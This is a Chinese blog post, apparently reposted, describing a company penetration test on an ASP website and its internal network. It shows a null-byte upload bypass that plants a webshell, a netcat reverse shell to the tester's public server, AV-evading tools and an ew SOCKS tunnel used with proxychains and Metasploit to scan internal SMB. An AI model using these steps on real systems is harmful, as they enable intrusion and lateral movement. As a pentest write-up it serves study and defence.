美文网首页
【内网渗透】记录一次内网渗透

【内网渗透】记录一次内网渗透

作者: Pino_HD | 来源:发表于2018-05-14 21:15 被阅读0次

在公司进行渗透测试项目,网站是asp的网站,有个上传点,但是上传的后缀名只能是jpg,gif,png,通过00截断绕过,但是文件名不能有asp,因此通过构造形如

aaa.cer%00.jpg

进行绕过。
但是发现服务器端会对上传的内容进行危险代码检测,<%是不能存在于里面的,Fuzz了一波后发现如果上传的文件头是GIF89a的话,并且一句话木马不在最后位置就可以进行绕过。成功得到shell

得到shell后发现权限比较低,是iis的


并没有想着提权,而是打算利用ew来把内网先带出来,然后进行内网的进一步扫描

通过tasklist命令,发现存在360杀毒软件,因此找了一个目录,将免杀的工具上传。

上传了一个nc.exe 打算获取一个交互式的shell(菜刀的shell不是交互式的,有的时候不好用)
现在我们的公网服务器上执行

nc -lvvp 4444

监听4444端口

然后,在“肉鸡”上执行

nc.exe -e cmd.exe [公网ip] 4444

发现在公网服务器上已经获取了交互式的shell

然后上传免杀的windows版本的ew
首先,在公网服务器上执行

./ew -s rcsocks -l 1080 -e 55

然后在“肉鸡”上执行

ew.exe -s rssocks -d [公网ip] -e 55

最后在我们的机器上,在proxychains.conf 添加

socks5 [公网ip] 1080

然后在我们机器上执行

proxychains msfconsole

就可以了,现在我们的msf就相当于在对方的内网当中了,扫一波smb


相关文章

  • 【内网渗透】记录一次内网渗透

    在公司进行渗透测试项目,网站是asp的网站,有个上传点,但是上传的后缀名只能是jpg,gif,png,通过00截断...

  • 内网渗透

    内网渗透

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • 我的第一次内网渗透

    我的第一次内网渗透 网络拓扑 因为是一次简单的内网渗透,以上靶机均为Windows Server2008,并且没有...

  • 当我讲起内网渗透,他们都弃我而去了

    前言在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 环境搭建...

  • 网络嗅探

    1、 (1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。 (2)内网渗透技术:嗅探、假消息攻...

  • 实战——红日ATT&CK系列靶场(一)

    前言: 在最近一年的工作中,很少能接触到内网渗透的工作,为了进一步锻炼内网渗透的能力,理清内网渗透中的思路及攻击手...

  • 基于MetaSploit内网穿透渗透测试

    自己在无聊捣鼓windows渗透的时候想到以往都是基于内网渗透,想要更加自由地进行渗透就需要内网穿透实现可以任意控...

  • 我是如何逃过所有杀软进行内网端口转发

    平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。 常见的端口转发 lcx.ex...

  • 内网渗透_域渗透2

    先放地址:https://bithack.io/forum/267 自从第一眼看到这篇文章之后就顺手将环境保存了网...

网友评论

      本文标题:【内网渗透】记录一次内网渗透

      本文链接:https://www.haomeiwen.com/subject/bhfsdftx.html